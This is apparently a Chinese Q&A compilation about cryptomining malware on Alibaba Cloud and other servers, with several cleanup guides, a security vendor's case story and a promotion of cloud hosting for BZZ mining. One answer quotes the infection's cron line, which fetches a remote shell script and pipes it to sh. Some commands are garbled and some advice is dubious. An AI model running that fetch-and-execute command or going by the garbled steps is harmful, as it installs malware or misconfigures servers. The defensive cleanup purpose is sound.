阿里云提示挖矿程序
㈠ 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
㈡ 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
㈢ 阿里云windows服务器中了挖矿的病毒怎么清理
光删除没用的,因为没有解决好漏洞。
建议是重做系统,然后找护卫神给你做一下系统安全加固,把漏洞彻底堵住才有效果。
㈣ 阿里云允许用云主机挖矿吗
是可以的。很多挖矿项目都可以使用云服务器,例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐,然而目前,因为各类硬件采购价格高、到货慢,然而时间不等人!综合对比下来,针对BZZ挖矿,推荐云服务器!
像Swarm BZZ这样的去中心化存储的情况下,以太坊生态中的热点数据每秒都在随时被调用和存储,所以除了CPU、内存和硬盘这三个主要的响应能力之外,还有一个要求宽带传输速度。
使用云服务器来部署bzz节点,核心理由就是一个字“快”,节点早一分钟上线,就能更早的获取到头矿!
经西部数码上千bzz节点部署的实践经验证明,bzz节点需要较高的带宽和超强的磁盘IO性能,以下是结合资源实际消耗情况合理搭配的配置。
4核CPU + 4G内存 + 100G SSD硬盘 + 20M带宽。上述配置,可以部署一个节点。
如果需要部署多节点可以选择多台这样的云服务器,或者选择更高配置的云服务器,如16核CPU + 24G内存 + 500G SSD硬盘 + 200M带宽,可部署5-10个节点。
㈤ 为什么我用流量矿石挖矿一直显示,程序初始化.准备挖矿数据
需要先缓存挖矿数据才能上传流量产生矿石。。。资深矿工劝你放弃。。。求采纳。。。我一天几十KG,现在。。一天才一点。。。。没意思了
㈥ 为啥挖不了比特币了今天中午明明还可以的,从十点钟开始运行挖矿程序了,重试了好多次,鱼池一只显示我
可能是算力比不上别人了呗,都被别人挖走了。比特币经历了电脑CPU挖矿 -> 电脑显卡挖矿 -> 专业矿机挖矿几个阶段,现在普通电脑挖矿都比较难了,除非是投资专门的挖矿设备。但是划不来。现在挖矿都相对专业化,流量矿石也是,肯定是专业矿机更好,不过如果有缓存,流量矿石的普通矿机还是可以挖一挖。
㈦ 收到挖矿短信什么意思
指浏览不良网站背后的黑客会通过程序窃取你的个人信息。
这个时候备份重要的数据和照片之后恢复出厂设置吧,不要安装不明来源的应用,另外权限设置里也尽量不要授权。
㈧ windows服务器的挖矿进程怎么关闭删除
这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后,使用里面的病毒查杀功能,直接就可以查杀这种电脑病毒了
㈨ 如何把右下角挖矿测试去除
一种是使用云安全中心自动清理,另一种是手动清除。登录到云安全中心控制台左侧栏,选择威胁检测,安全告警处理在安全告警处理列表中,找到挖矿程序,然后点处理云安全中心安全告警处理然后根据提示一步步操作即可。
去除的方法
手动清除挖矿程序护云盾以Linux服务器为例,按照以下步骤排查及处理查看挖矿进程的执行PID,命令表示该进程的PID。清除挖矿进程的执行文件,在高CPU消耗的进程中定位到挖矿进程,并杀死该进程。
检查云服务器的防火墙中是否存在挖矿程序的矿池地址,可疑通信地址和开放端口,命令iptablesLn执行以下命令清除恶意矿池地址vietcsysconfigiptables排查是否存在定时任务crontabl根据排查的结果,对可疑的定时任务文件进行清理,防止二次入侵。